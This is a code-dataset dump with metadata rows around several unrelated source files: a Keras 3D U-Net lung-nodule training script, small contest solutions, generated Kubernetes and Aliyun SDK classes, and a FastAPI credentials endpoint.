|
[
"MIT"
] | 1
|
2018-06-09T15:45:13.000Z
|
2018-06-09T15:45:13.000Z
|
code/Andre/py/refit_unet_d8g_222_swrap_03.py
|
astoc/kaggle_dsb2017
|
2421442cb220518d9ad70b0f3f7611ccf6303af4
|
[
"MIT"
] | 9
|
2017-07-18T11:42:25.000Z
|
2019-11-20T23:32:38.000Z
|
"""
Created on Thu Jan 26 17:04:11 2017
@author: Andre Stochniol, andre@stochniol.com
Fit unet style nodule identifier on Luna databaset using 8-grid scheme
Physical resolution 2x2x2mm
Data aggregated, shuffled; wrap augmentation used (swrap)
"""
import numpy as np
from keras.models import load_model,Model
from keras.layers import MaxPooling3D
from keras.layers import Convolution3D
from keras.layers import Input, merge, UpSampling3D
from keras.optimizers import Adam
from keras import backend as K
#from keras.preprocessing.image import ImageDataGenerator # Keras original
from image_as_mod3d_2dmask import ImageDataGenerator # our modified version
K.set_image_dim_ordering('th')
smooth = 1.
def dice_coef(y_true, y_pred):
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
DICE_LOW_LIMIT = 0 ## was 0.001
def dice_coef_np(y_true, y_pred):
y_true_f = y_true.flatten()
y_pred_f = y_pred.flatten()
y_pred_f [y_pred_f < DICE_LOW_LIMIT] = 0.
y_pred_f [y_pred_f > 1- DICE_LOW_LIMIT] = 1.
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)
def dice_coef_pos_np(y_true, y_pred, pos = 0):
y_true_f = y_true[:,pos].flatten()
y_pred_f = y_pred[:,pos].flatten()
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)
def dice_coef_loss(y_true, y_pred):
return -dice_coef(y_true, y_pred)
def unet_model_xd3_2_6l_grid(nb_filter=48, dim=5, clen=3 , img_rows=224, img_cols=224 ): # NOTE that this procedure is/should be used with img_rows & img_cols as None
# aiming for architecture similar to the http://cs231n.stanford.edu/reports2016/317_Report.pdf
# Our model is six layers deep, consisting of a series of three CONV-RELU-POOL layyers (with 32, 32, and 64 3x3 filters), a CONV-RELU layer (with 128 3x3 filters), three UPSCALE-CONV-RELU lay- ers (with 64, 32, and 32 3x3 filters), and a final 1x1 CONV- SIGMOID layer to output pixel-level predictions. Its struc- ture resembles Figure 2, though with the number of pixels, filters, and levels as described here
## 3D CNN version of a previously developed unet_model_xd_6j
zconv = clen
inputs = Input((1, dim, img_rows, img_cols))
conv1 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(inputs)
conv1 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv1)
pool1 = MaxPooling3D(pool_size=(2, 2, 2))(conv1)
conv2 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(pool1)
conv2 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv2)
pool2 = MaxPooling3D(pool_size=(2, 2, 2))(conv2)
conv4 = Convolution3D(4*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(pool2)
conv4 = Convolution3D(4*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv4)
up6 = merge([UpSampling3D(size=(2, 2, 2))(conv4), conv2], mode='concat', concat_axis=1)
conv6 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(up6)
conv6 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv6)
up7 = merge([UpSampling3D(size=(2, 2, 2))(conv6), conv1], mode='concat', concat_axis=1) # original - only works for even dim
conv7 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(up7)
conv7 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv7)
pool11 = MaxPooling3D(pool_size=(2, 1, 1))(conv7)
conv12 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(pool11)
conv12 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(conv12)
pool12 = MaxPooling3D(pool_size=(2, 1, 1))(conv12)
conv13 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(pool12)
conv13 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(conv13)
pool13 = MaxPooling3D(pool_size=(2, 1, 1))(conv13)
if (dim < 16):
conv8 = Convolution3D(1, 1, 1, 1, activation='sigmoid')(pool13)
else: # need one extra layer to get to 1D x 2D mask ...
conv14 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(pool13)
conv14 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(conv14)
pool14 = MaxPooling3D(pool_size=(2, 1, 1))(conv14)
conv8 = Convolution3D(1, 1, 1, 1, activation='sigmoid')(pool14)
model = Model(input=inputs, output=conv8)
model.compile(optimizer=Adam(lr=1e-4), loss=dice_coef_loss, metrics=[dice_coef])
#model.compile(optimizer=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0), loss=dice_coef_loss, metrics=[dice_coef])
return model
def grid_data(source, grid=32, crop=16, expand=12):
height = source.shape[3] # should be 224 for our data, when used in the initial fix-size mode
width = source.shape[4]
gridheight = (height - 2 * crop) // grid # should be 6 for our data
gridwidth = (width - 2 * crop) // grid
cells = []
for j in range(gridheight):
for i in range (gridwidth):
cell = source[:,:,:, crop+j*grid-expand:crop+(j+1)*grid+expand, crop+i*grid-expand:crop+(i+1)*grid+expand]
cells.append(cell)
cells = np.vstack (cells)
return cells, gridwidth, gridheight
def data_from_grid (cells, gridwidth, gridheight, grid=32):
width = cells.shape[4]
crop = (width - grid ) // 2 ## for simplicity we are assuming the same crop (and grid) in x & y directions
if crop > 0: # do NOT crop with 0 as we get empty cells ...
cells = cells[:,:,:,crop:-crop,crop:-crop]
shape = cells.shape
new_shape_1_dim = shape[0]// (gridwidth * gridheight) # ws // 36 -- Improved on 20170306
new_shape = (gridwidth * gridheight, new_shape_1_dim, ) + tuple([x for x in shape][1:]) # was 36, Improved on 20170306
cells = np.reshape(cells, new_shape)
cells = np.moveaxis(cells, 0, -3)
shape = cells.shape
new_shape2 = tuple([x for x in shape[0:3]]) + (gridheight, gridwidth,) + tuple([x for x in shape[4:]])
cells = np.reshape(cells, new_shape2)
cells = cells.swapaxes(-2, -3)
shape = cells.shape
combine_shape =tuple([x for x in shape[0:3]]) + (shape[-4]*shape[-3], shape[-2]*shape[-1],)
cells = np.reshape(cells, combine_shape)
return cells
def data_from_grid_by_proximity (cells, gridwidth, gridheight, grid=32):
# disperse the sequential dats into layers and then use data_from_grid
shape = cells.shape
new_shape_1_dim = shape[0]// (gridwidth * gridheight) # ws // 36 -- Improved on 20170306
### NOTE tha we invert the order of shapes below to get the required proximity type ordering
new_shape = (new_shape_1_dim, gridwidth * gridheight, ) + tuple([x for x in shape][1:]) # was 36, Improved on 20170306
#new_shape = (gridwidth * gridheight, new_shape_1_dim, ) + tuple([x for x in shape][1:]) # was 36, Improved on 20170306
# swap ordering of axes
cells = np.reshape(cells, new_shape)
cells = cells.swapaxes(0, 1)
cells = np.reshape(cells, shape)
cells = data_from_grid (cells, gridwidth, gridheight, grid)
return cells
def load_aggregate_masks_scans (masks_mnames, grids, upgrid_multis):
scans = []
masks = []
igrid = 0
for masks_names in masks_mnames:
if (len(masks_names) > 0):
grid = grids[igrid]
upgrid_multi = upgrid_multis[igrid]
upgcount = upgrid_multi * upgrid_multi
scans1 = []
masks1 = []
for masks_name in masks_names:
print ("Loading: ", masks_name)
masks0 = np.load(''.join((masks_name, ".npz")))['arr_0']
scans0 = np.load(''.join((masks_name.replace("masks_", "scans_", 1), ".npz")))['arr_0']
masks1.append(masks0)
scans1.append(scans0)
scans1 = np.vstack(scans1)
masks1 = np.vstack(masks1)
if len(masks) > 0:
scans1 = np.vstack([scans1, scans])
masks1 = np.vstack([masks1, masks])
lm = len(masks1) // upgcount * upgcount
scans1 = scans1[0:lm] # cut to multiples of upgcount
masks1 = masks1[0:lm]
index_shuf = np.arange(lm)
np.random.shuffle(index_shuf)
scans1 = scans1[index_shuf]
masks1 = masks1[index_shuf]
scans = data_from_grid_by_proximity(scans1, upgrid_multi, upgrid_multi, grid=grid)
masks = data_from_grid_by_proximity(masks1, upgrid_multi, upgrid_multi, grid=grid)
igrid += 1
return masks, scans
if __name__ == '__main__':
# Key initial parameters
dim = 8
start_from_scratch = False
load_initial_weights = False
if start_from_scratch and load_initial_weights:
model_weights_name_to_start_from = "../luna/models/d8_2x2x2_best_weights.h5" # only used when start_from_scratch is True and load_initial_weights is True
### KEY running parameteres
nb_epoch = 2
model_load_name = '../luna/models/d8g_bre_model_10.h5'
model_save_name = '../luna/models/d8g_bre_model_12.h5' ### MUST include "_model" string as we use this for a substituion for weights file
seed = 10000 # should be varied by steps/stages
set_lr_value = False
new_lr_value = 1e-5 # only used when set_lr_value is True
use_large_validation = True
grids = [10, 20]
upgrid_multis = [2, 8] # we modify only the last one if/as needed
batch_size = 28 # calculated for a 12GB graphics card (such as Tesla K80/AWS P2 system)
masks_mnames = [
[
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_0_3_4003", # note no npz extension here
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_4_8_4968",
"../luna/models/masks_d8g1x10ba4_2x2x2_blanks_0_3_64769",
"../luna/models/masks_d8g1x10ba4_2x2x2_blanks_4_8_91485"
],
[
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_0_3_1211",
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_4_8_1265",
"../luna/models/masks_d8g1x20ba4_2x2x2_blanks_0_3_64769",
"../luna/models/masks_d8g1x20ba4_2x2x2_blanks_4_8_91485"
],
[
#"../luna/model_data/masks_d16g1x40ba8_2x1x1_nodules_0_3_6897"
]]
masks_val_mnames = [
[
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_9_9_864" # note no npz extension here
],
[
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_9_9_255"
],
[
# "../luna/model_data/masks_d16g1x40ba8_2x1x1_blanks_8_9_35056"
]]
masks_val_large_mnames = [
[
"../luna/models/masks_d8g1x10ba4_2x2x2_nodules_9_9_864", # note no npz extension here
"../luna/models/masks_d8g1x10ba4_2x2x2_blanks_9_9_18642"
],
[
"../luna/models/masks_d8g1x20ba4_2x2x2_nodules_9_9_255",
"../luna/models/masks_d8g1x20ba4_2x2x2_blanks_9_9_18642"
],
[
#, "../luna/model_data/masks_d16g1x40ba8_2x1x1_blanks_8_9_35056"
]]
np.random.seed(seed)
masks, scans = load_aggregate_masks_scans (masks_mnames, grids, upgrid_multis)
print ("Masks and Scans shapes: ", masks.shape, scans.shape)
masks[masks < 0] = 0 # just in case (eliminate the blanks's marking)
if masks.shape[2] > 1:
masks = masks[:,:,masks.shape[2] // 2] ## select the central value as this one contains still all data
masks = masks[:, np.newaxis]
print ("Masks shape after 2D mapping: ", masks.shape)
#np.random.seed(121) # you may wish to keep this seed constant for validation purposes
masks_val, scans_val = load_aggregate_masks_scans (masks_val_mnames, grids, upgrid_multis)
print ("Val Masks and Scans shapes: ", masks_val.shape, scans_val.shape)
masks_val[masks_val < 0] = 0
if masks_val.shape[2] > 1:
masks_val = masks_val[:,:,masks_val.shape[2] // 2] ## select the central value as this one contains still all data
masks_val = masks_val[:, np.newaxis]
print ("Masks_val shape after 2D mapping: ", masks_val.shape)
masks_val_large, scans_val_large = load_aggregate_masks_scans (masks_val_large_mnames, grids, upgrid_multis)
print ("Large Val Masks and Scans shapes: ", masks_val_large.shape, scans_val_large.shape)
masks_val_large[masks_val_large < 0] = 0
if masks_val_large.shape[2] > 1:
masks_val_large = masks_val_large[:,:,masks_val_large.shape[2] // 2] ## select the central value as this one contains still all data
masks_val_large = masks_val_large[:, np.newaxis]
print ("Large Val Masks shape after 2D mapping: ", masks_val_large.shape)
if start_from_scratch:
model = unet_model_xd3_2_6l_grid(nb_filter=20, dim=dim, clen=3, img_rows=None , img_cols=None )
print(model.summary())
if load_initial_weights:
model_weights_name = model_weights_name_to_start_from ### could potentially load best weights
model.load_weights(model_weights_name)
print("Weights and output models: ", model_weights_name, model_save_name)
else:
print("Start from scratch (no weights),output models: ", model_save_name)
else:
## load_previous_model
print ("Loading model: ", model_load_name)
model = load_model(model_load_name, #3
custom_objects={'dice_coef_loss': dice_coef_loss,
'dice_coef': dice_coef
}
)
#print(model.summary())
print("Load and output models: ", model_load_name, model_save_name)
## set the data ...
masks = masks.astype(np.int16)
final_couple_of_iterations = False
if final_couple_of_iterations:
masks = np.concatenate((masks, masks_val))
scans = np.concatenate((scans, scans_val))
data_gen_args = dict(featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0,
width_shift_range=0.5,
height_shift_range=0.5,
horizontal_flip=True,
vertical_flip=False,
fill_mode= "wrap",
zoom_range=0
)
image_datagen = ImageDataGenerator(**data_gen_args)
mask_datagen = ImageDataGenerator(**data_gen_args)
# Provide the same seed and keyword arguments to the fit and flow methods
shuffle = True # default
image_datagen.fit(scans, augment=True, seed=seed)
mask_datagen.fit(masks, augment=True, seed=seed)
image_generator = image_datagen.flow(scans,
batch_size = batch_size,
#shuffle = shuffle,
seed=seed)
mask_generator = mask_datagen.flow(masks,
batch_size = batch_size,
#shuffle = shuffle,
seed=seed)
# combine generators into one which yields image and masks
train_generator = zip(image_generator, mask_generator)
if set_lr_value:
print("Model learning rate (old): ", model.optimizer.lr.get_value()) # was 1e-4
model.optimizer.lr.set_value(new_lr_value)
print("Model learning rate(new): ", model.optimizer.lr.get_value())
samples_per_epoch = masks.shape[0]
model.fit_generator(
train_generator,
samples_per_epoch= samples_per_epoch,
nb_epoch = nb_epoch,
validation_data = ( scans_val, masks_val),
verbose=1)
model.save(model_save_name)
model.save_weights(model_save_name.replace("_model", "_weights", 1))
masks_pred = model.predict(scans_val, verbose=1)
dice_check = dice_coef_np(masks_val, masks_pred)
print ("dice_check: ", dice_check)
if use_large_validation:
masks_pred_large = model.predict(scans_val_large, batch_size =1, verbose=1)
dice_check = dice_coef_np(masks_val_large, masks_pred_large)
print ("Full dice_check: ", dice_check)
print("Model learning rate: ", model.optimizer.lr.get_value())
| 41.933014
| 421
| 0.63293
|
129b7622967975dfed73c61a77036c9955cecc2d
| 274
|
py
|
Python
|
Exercícios/1987 - Divisibilidade por 3.py
|
NycoleRibeiro/Exercicios-URI
|
6db585fade12e487b64775f063b7a85dcdf22137
|
[
"MIT"
] | null | null | null |
Exercícios/1987 - Divisibilidade por 3.py
|
NycoleRibeiro/Exercicios-URI
|
6db585fade12e487b64775f063b7a85dcdf22137
|
[
"MIT"
] | null | null | null |
Exercícios/1987 - Divisibilidade por 3.py
|
NycoleRibeiro/Exercicios-URI
|
6db585fade12e487b64775f063b7a85dcdf22137
|
[
"MIT"
] | null | null | null |
while True:
try:
n, m = input().split(" ")
soma = 0
for i in m:
soma += int(i)
print(soma, end=' ')
if soma % 3 == 0:
print("sim")
else:
print("nao")
except EOFError:
break
| 18.266667
| 33
| 0.375912
|
88a49ed30e9f4ada5aa1b14a326e15faeae9e98c
| 12,576
|
py
|
Python
|
kubernetes_asyncio/client/models/v1_stateful_set_status.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_stateful_set_status.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_stateful_set_status.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.14.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1StatefulSetStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'collision_count': 'int',
'conditions': 'list[V1StatefulSetCondition]',
'current_replicas': 'int',
'current_revision': 'str',
'observed_generation': 'int',
'ready_replicas': 'int',
'replicas': 'int',
'update_revision': 'str',
'updated_replicas': 'int'
}
attribute_map = {
'collision_count': 'collisionCount',
'conditions': 'conditions',
'current_replicas': 'currentReplicas',
'current_revision': 'currentRevision',
'observed_generation': 'observedGeneration',
'ready_replicas': 'readyReplicas',
'replicas': 'replicas',
'update_revision': 'updateRevision',
'updated_replicas': 'updatedReplicas'
}
def __init__(self, collision_count=None, conditions=None, current_replicas=None, current_revision=None, observed_generation=None, ready_replicas=None, replicas=None, update_revision=None, updated_replicas=None): # noqa: E501
"""V1StatefulSetStatus - a model defined in OpenAPI""" # noqa: E501
self._collision_count = None
self._conditions = None
self._current_replicas = None
self._current_revision = None
self._observed_generation = None
self._ready_replicas = None
self._replicas = None
self._update_revision = None
self._updated_replicas = None
self.discriminator = None
if collision_count is not None:
self.collision_count = collision_count
if conditions is not None:
self.conditions = conditions
if current_replicas is not None:
self.current_replicas = current_replicas
if current_revision is not None:
self.current_revision = current_revision
if observed_generation is not None:
self.observed_generation = observed_generation
if ready_replicas is not None:
self.ready_replicas = ready_replicas
self.replicas = replicas
if update_revision is not None:
self.update_revision = update_revision
if updated_replicas is not None:
self.updated_replicas = updated_replicas
@property
def collision_count(self):
"""Gets the collision_count of this V1StatefulSetStatus. # noqa: E501
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision. # noqa: E501
:return: The collision_count of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._collision_count
@collision_count.setter
def collision_count(self, collision_count):
"""Sets the collision_count of this V1StatefulSetStatus.
collisionCount is the count of hash collisions for the StatefulSet. The StatefulSet controller uses this field as a collision avoidance mechanism when it needs to create the name for the newest ControllerRevision. # noqa: E501
:param collision_count: The collision_count of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._collision_count = collision_count
@property
def conditions(self):
"""Gets the conditions of this V1StatefulSetStatus. # noqa: E501
Represents the latest available observations of a statefulset's current state. # noqa: E501
:return: The conditions of this V1StatefulSetStatus. # noqa: E501
:rtype: list[V1StatefulSetCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""Sets the conditions of this V1StatefulSetStatus.
Represents the latest available observations of a statefulset's current state. # noqa: E501
:param conditions: The conditions of this V1StatefulSetStatus. # noqa: E501
:type: list[V1StatefulSetCondition]
"""
self._conditions = conditions
@property
def current_replicas(self):
"""Gets the current_replicas of this V1StatefulSetStatus. # noqa: E501
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision. # noqa: E501
:return: The current_replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._current_replicas
@current_replicas.setter
def current_replicas(self, current_replicas):
"""Sets the current_replicas of this V1StatefulSetStatus.
currentReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by currentRevision. # noqa: E501
:param current_replicas: The current_replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._current_replicas = current_replicas
@property
def current_revision(self):
"""Gets the current_revision of this V1StatefulSetStatus. # noqa: E501
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas). # noqa: E501
:return: The current_revision of this V1StatefulSetStatus. # noqa: E501
:rtype: str
"""
return self._current_revision
@current_revision.setter
def current_revision(self, current_revision):
"""Sets the current_revision of this V1StatefulSetStatus.
currentRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [0,currentReplicas). # noqa: E501
:param current_revision: The current_revision of this V1StatefulSetStatus. # noqa: E501
:type: str
"""
self._current_revision = current_revision
@property
def observed_generation(self):
"""Gets the observed_generation of this V1StatefulSetStatus. # noqa: E501
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server. # noqa: E501
:return: The observed_generation of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._observed_generation
@observed_generation.setter
def observed_generation(self, observed_generation):
"""Sets the observed_generation of this V1StatefulSetStatus.
observedGeneration is the most recent generation observed for this StatefulSet. It corresponds to the StatefulSet's generation, which is updated on mutation by the API Server. # noqa: E501
:param observed_generation: The observed_generation of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._observed_generation = observed_generation
@property
def ready_replicas(self):
"""Gets the ready_replicas of this V1StatefulSetStatus. # noqa: E501
readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition. # noqa: E501
:return: The ready_replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._ready_replicas
@ready_replicas.setter
def ready_replicas(self, ready_replicas):
"""Sets the ready_replicas of this V1StatefulSetStatus.
readyReplicas is the number of Pods created by the StatefulSet controller that have a Ready Condition. # noqa: E501
:param ready_replicas: The ready_replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._ready_replicas = ready_replicas
@property
def replicas(self):
"""Gets the replicas of this V1StatefulSetStatus. # noqa: E501
replicas is the number of Pods created by the StatefulSet controller. # noqa: E501
:return: The replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._replicas
@replicas.setter
def replicas(self, replicas):
"""Sets the replicas of this V1StatefulSetStatus.
replicas is the number of Pods created by the StatefulSet controller. # noqa: E501
:param replicas: The replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
if replicas is None:
raise ValueError("Invalid value for `replicas`, must not be `None`") # noqa: E501
self._replicas = replicas
@property
def update_revision(self):
"""Gets the update_revision of this V1StatefulSetStatus. # noqa: E501
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas) # noqa: E501
:return: The update_revision of this V1StatefulSetStatus. # noqa: E501
:rtype: str
"""
return self._update_revision
@update_revision.setter
def update_revision(self, update_revision):
"""Sets the update_revision of this V1StatefulSetStatus.
updateRevision, if not empty, indicates the version of the StatefulSet used to generate Pods in the sequence [replicas-updatedReplicas,replicas) # noqa: E501
:param update_revision: The update_revision of this V1StatefulSetStatus. # noqa: E501
:type: str
"""
self._update_revision = update_revision
@property
def updated_replicas(self):
"""Gets the updated_replicas of this V1StatefulSetStatus. # noqa: E501
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision. # noqa: E501
:return: The updated_replicas of this V1StatefulSetStatus. # noqa: E501
:rtype: int
"""
return self._updated_replicas
@updated_replicas.setter
def updated_replicas(self, updated_replicas):
"""Sets the updated_replicas of this V1StatefulSetStatus.
updatedReplicas is the number of Pods created by the StatefulSet controller from the StatefulSet version indicated by updateRevision. # noqa: E501
:param updated_replicas: The updated_replicas of this V1StatefulSetStatus. # noqa: E501
:type: int
"""
self._updated_replicas = updated_replicas
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1StatefulSetStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 36.988235
| 235
| 0.664202
|
6893957cd3831d9a67709f381b84cc421eeb15d4
| 86
|
py
|
Python
|
code/arc094_a_01.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | 3
|
2019-08-16T16:55:48.000Z
|
2021-04-11T10:21:40.000Z
|
code/arc094_a_01.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
code/arc094_a_01.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
l=sorted(map(int,input().split()))
a=2*l[2]-l[1]-l[0]
print((a+3)//2 if a%2 else a//2)
| 28.666667
| 34
| 0.569767
|
78a28749c9d67da44143fc999db6da4ee140d967
| 1,914
|
py
|
Python
|
aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/PushObjectCacheRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/PushObjectCacheRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-cdn/aliyunsdkcdn/request/v20141111/PushObjectCacheRequest.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcdn.endpoint import endpoint_data
class PushObjectCacheRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2014-11-11', 'PushObjectCache')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Area(self):
return self.get_query_params().get('Area')
def set_Area(self,Area):
self.add_query_param('Area',Area)
def get_ObjectPath(self):
return self.get_query_params().get('ObjectPath')
def set_ObjectPath(self,ObjectPath):
self.add_query_param('ObjectPath',ObjectPath)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_SecurityToken(self):
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self,SecurityToken):
self.add_query_param('SecurityToken',SecurityToken)
| 34.178571
| 74
| 0.761233
|
ac37b0baf014e515f4baa39f82035855da566d6a
| 1,732
|
py
|
Python
|
quilt3_local/quilt3_local/api.py
|
admariner/quilt
|
e8ff056f6c58b2e54028f45a0b4a14e255df857c
|
[
"Apache-2.0"
] | null | null | null |
quilt3_local/quilt3_local/api.py
|
admariner/quilt
|
e8ff056f6c58b2e54028f45a0b4a14e255df857c
|
[
"Apache-2.0"
] | 32
|
2021-10-06T20:06:16.000Z
|
2021-12-27T13:22:19.000Z
|
quilt3_local/quilt3_local/api.py
|
admariner/quilt
|
e8ff056f6c58b2e54028f45a0b4a14e255df857c
|
[
"Apache-2.0"
] | null | null | null |
import logging
import sys
import ariadne.asgi
import boto3
import fastapi
from botocore.exceptions import ClientError
from .context import QuiltContext
from .graphql import schema as graphql_schema
logger = logging.getLogger(__name__)
sts_client = boto3.client("sts")
session_cred = boto3._get_default_session().get_credentials()
if session_cred is None:
print("AWS credentials required. See boto3 docs for details:")
print("https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html#configuring-credentials")
sys.exit(1)
api = fastapi.FastAPI()
@api.middleware("http")
async def add_quilt_context(request: fastapi.Request, call_next):
with QuiltContext():
return await call_next(request)
@api.get("/api/auth/get_credentials")
def get_credentials():
"""
Obtain credentials corresponding to your role.
Returns a JSON object with the following keys:
AccessKeyId(string): access key ID
SecretAccessKey(string): secret key
SessionToken(string): session token
Expiration(ISO date string)
"""
try:
if session_cred.token:
return {
"AccessKeyId": session_cred.access_key,
"SecretAccessKey": session_cred.secret_key,
"SessionToken": session_cred.token,
"Expiration": getattr(session_cred, "expiry_time", None),
}
return sts_client.get_session_token()["Credentials"]
except ClientError:
logger.exception("Failed to get credentials for your AWS Account")
raise fastapi.HTTPException(500, "Failed to get credentials for your AWS Account.")
api.mount("/graphql", ariadne.asgi.GraphQL(graphql_schema), "GraphQL")
| 30.385965
| 115
| 0.704388
|
307a63d23cff1b18e2d90a35a92c8459525e02d9
| 637
|
py
|
Python
|
scripts/run_bbtrim.py
|
marykthompson/ribopop_rnaseq
|
6125bc15657491f14d99fd192a711110884e8c11
|
[
